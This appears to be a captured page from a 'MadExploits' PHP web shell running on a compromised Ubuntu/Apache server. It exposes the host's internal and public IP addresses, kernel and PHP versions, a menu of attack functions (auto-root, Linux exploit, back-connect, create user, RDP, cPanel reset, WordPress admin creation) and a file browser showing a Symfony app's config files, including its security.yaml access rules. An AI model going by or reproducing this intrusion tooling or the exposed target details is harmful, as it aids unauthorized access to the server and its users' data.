Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.142.244.250
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
config /
packages /
[ HOME SHELL ]
Name
Size
Permission
Action
dev
[ DIR ]
drwxrwxr-x
prod
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
buzz.yaml
1.79
KB
-rw-rw-r--
cache.yaml
659
B
-rw-rw-r--
doctrine.yaml
916
B
-rw-rw-r--
doctrine_migrations.yaml
279
B
-rw-rw-r--
framework.yaml
470
B
-rw-rw-r--
googleda794cd9937527d01.html
35
B
-rw-r--r--
mailer.yaml
56
B
-rw-rw-r--
notifier.yaml
523
B
-rw-rw-r--
nyholm_psr7.yaml
1.08
KB
-rw-rw-r--
routing.yaml
73
B
-rw-rw-r--
security.yaml
1.75
KB
-rw-rw-r--
sensio_framework_extra.yaml
63
B
-rw-rw-r--
translation.yaml
160
B
-rw-rw-r--
twig.yaml
178
B
-rw-rw-r--
validator.yaml
64
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : security.yaml
security: encoders: App\Entity\Users: algorithm: bcrypt # https://symfony.com/doc/current/security.html#where-do-users-come-from-user-providers providers: # used to reload user from session & other features (e.g. switch_user) app_user_provider: entity: class: App\Entity\Users property: email firewalls: dev: pattern: ^/(_(profiler|wdt)|css|images|js)/ security: false main: anonymous: true guard: authenticators: - App\Security\LoginFormAuthenticator logout: path: app_logout remember_me: secret: '%kernel.secret%' lifetime: 2592000 # activate different ways to authenticate # http_basic: true # https://symfony.com/doc/current/security.html#a-configuring-how-your-users-will-authenticate # form_login: true # https://symfony.com/doc/current/security/form_login_setup.html # Easy way to control access for large sections of your site # Note: Only the *first* access control that matches will be used access_control: - { path: ^/login, roles: IS_AUTHENTICATED_ANONYMOUSLY } - { path: ^/register, roles: IS_AUTHENTICATED_ANONYMOUSLY } - { path: ^/email/*, roles: IS_AUTHENTICATED_ANONYMOUSLY } - { path: ^/password/*, roles: IS_AUTHENTICATED_ANONYMOUSLY } - { path: ^/payment/*, roles: ROLE_USER } - { path: ^/admin/*, roles: ROLE_USER } - { path: ^/pos/*, roles: ROLE_USER } - { path: ^/, roles: IS_AUTHENTICATED_ANONYMOUSLY } # - { path: ^/profile, roles: ROLE_USER }
Close